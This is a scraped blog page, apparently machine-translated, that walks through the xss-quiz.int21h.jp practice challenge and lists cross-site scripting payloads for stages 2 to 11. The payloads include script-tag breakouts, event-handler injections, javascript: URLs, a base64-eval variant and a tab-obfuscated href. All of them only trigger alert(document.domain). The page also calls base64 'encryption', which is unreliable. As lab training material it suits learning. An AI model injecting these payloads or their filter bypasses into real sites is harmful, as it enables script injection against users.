XSS detection - Code World

XSS detection

Others 2021-01-26 04:44:07 views: null

XSS detection

Experiment address: https://xss-quiz.int21h.jp/

stage2

"><script>alert(document.domain)</script>

Insert picture description here

stage3

Just select in Select

Japan</option><script>alert(document.domain);</script>

Insert picture description here

stage4

Change the input attribute,

"><script>alert(document.domain);</script>

Insert picture description here

stage5

Limit length
Change length

"><script>alert(document.domain);</script>

Insert picture description here

stage 6

Automatically translated into ISO 8859-1 character set, such as> entity name display>

" onmouseover=" alert(document.domain);

stage7

Join

" onmouseover= alert(document.domain)

stage8

Through URL

 javascript:alert(document.domain);

stage9

Add to tag span

onclick="alert(document.domain)"

stage10

Encrypt part of the content with base64

"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))</script>

Note: bases64 is reversible encryption

stage11

Special symbols sneak in

"><a	href="javascr&#09ipt:alert(document.domain);">xss</a>

Insert picture description here

Guess you like

Origin blog.csdn.net/qq_37697566/article/details/104605729

XSS detection

XSS attack detection and repair method

On XSS

XSS (a)

xss

XSS learning

Attack it xss !!!

What is XSS

XSS - vulnerability

XSS prevention

For various XSS

XSS 2

XSS 3

xss Introduction

XSS hazard

xss depth

Detailed XSS

xss summary

细说XSS

XSS practice

0502 xss

【DVWA】XSS

XSS on the Web

DVWA - XSS (Reflected) (reflective XSS)

XSS challenge of xss-challenge

Anomaly detection (abnormality detection)

Target detection [Object Detection]

12. xss bypass xss screenshot

What is an XSS attack? What are the characteristics of XSS attacks?

Solve problems encountered xss

Recommended

TIOBE May list: Fortran “resurrected” into Top 10

GCC 14.1 released

Ranking

B. Little Girl and Game【1300 / 回文字符串博弈论】

CIKERS Shane 20190613

"Javascript advanced programming" study notes - the constructor and prototype

beeline hiveserver2 start

springboot - Automatically backup mysql data every day

Data Storage Full Solution--Detailed Persistence Technology

Detailed Explanation of Spring Web MVC DispatcherServlet—Official Original

TCP / IP protocol layers structure and function

Command type literal pos: unknown； Fallback type literal pos: unknown] with root cause

Design of multifunctional curtain controller with indoor anti-theft alarm

Daily

More

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)